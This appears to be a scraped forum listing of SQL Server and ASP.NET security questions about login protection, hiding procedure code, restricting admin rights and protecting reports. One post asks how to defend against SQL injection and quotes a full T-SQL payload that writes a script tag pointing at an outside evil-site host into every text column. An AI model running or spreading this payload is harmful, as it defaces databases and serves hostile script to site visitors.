I've been trying to look for information about using an SQL 2005 database with ASP.NET 2.0 - while there are loads of different articles coving configuring a database to use with asp.net, I cannot find anything on securing a sub-folder in my asp.net application. At the moment I am successfully connecting to, and validating users via a login page in my asp.net application, however, this is all pointless since I can still browse to the pages without logging in! I have tried putting in the usual <location> tags in my root web.config file and asp.net throws an error referring to my connection string, I have also tried adding a web.config file to the sub-directory, but that just uses the windows login, and I can't find anything that'll allow me to tie my own login page to it... Arrrgh! Any help will be greatly appreciated!
Thanks in advance.
View 3 Replies
View Related
Dec 22, 2006
Hello,I wrote some complicated functions (and stored procedures) in databaseat my work. System administrator (and every db user) can view codes(in Enterprise Manager for eg.). My employer needs periodic modifyingof code and so I'm required to do it. But I can loose my job :)because users are able to modify code (althout they ware too lazy tocreate it by themselves).Is this possible to protect functions from view it?[please, don't mind my english]
View 5 Replies
View Related
Jul 20, 2005
Hi,I need to provide a facility to do routine database administration(backups, etc.) without allowing the logged in user to modify thedata in any of the SQL server tables. Is there any way to accomplishthis (such as maybe password protecting the tables or otherwise)? I amfairly new to SQL server - so would appreciate any pointers to this.Thanks a ton!Regards,Radha
View 1 Replies
View Related
May 13, 2008
Helloo all,
I would like to gather some thoughts on how to secure my database (running on sql server 2005) from SQL injection , one such as :
Code Snippet
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
Basically this statement finds every text column contained in a database and inserts a cross site script into it.
I know this topic has been covered in some depth in articles such as :
MSDN article on SQL injection (http://msdn.microsoft.com/en-us/library/ms161953.aspx)
and on forums a few times.
And the general consensus is to check application code and fix it, which is fine, however we have many legacy systems where it would be too time consuming to fix the problem at the application level.
So the alternative is fix this at the database level.
A possible solution is to isolate the application access to only the objects it uses, and none of the system objects. This should prevent the statement above from running, because it requests access to the sysobjects and syscolumns views. I could implement this by changing the schema for all user objects from dbo to [myAppSchema] and assigning it to my applications database user.
Not particularly elegant but might work, what do you think?
Nigel.
View 4 Replies
View Related
May 1, 2008
I have developed some custom SQL reports that query a major software vendor's SQL Database, and I would like to sell them commercially.
The only problem is that I dont know how to protect them from casual piracy? Ideally I would like to tie them into a uniqueness of the database server eg the machine SID or similar but have no experience of this..
Can anyone recommend a way of commercially protecting the code pleaaaase?
Thanks!
View 3 Replies
View Related
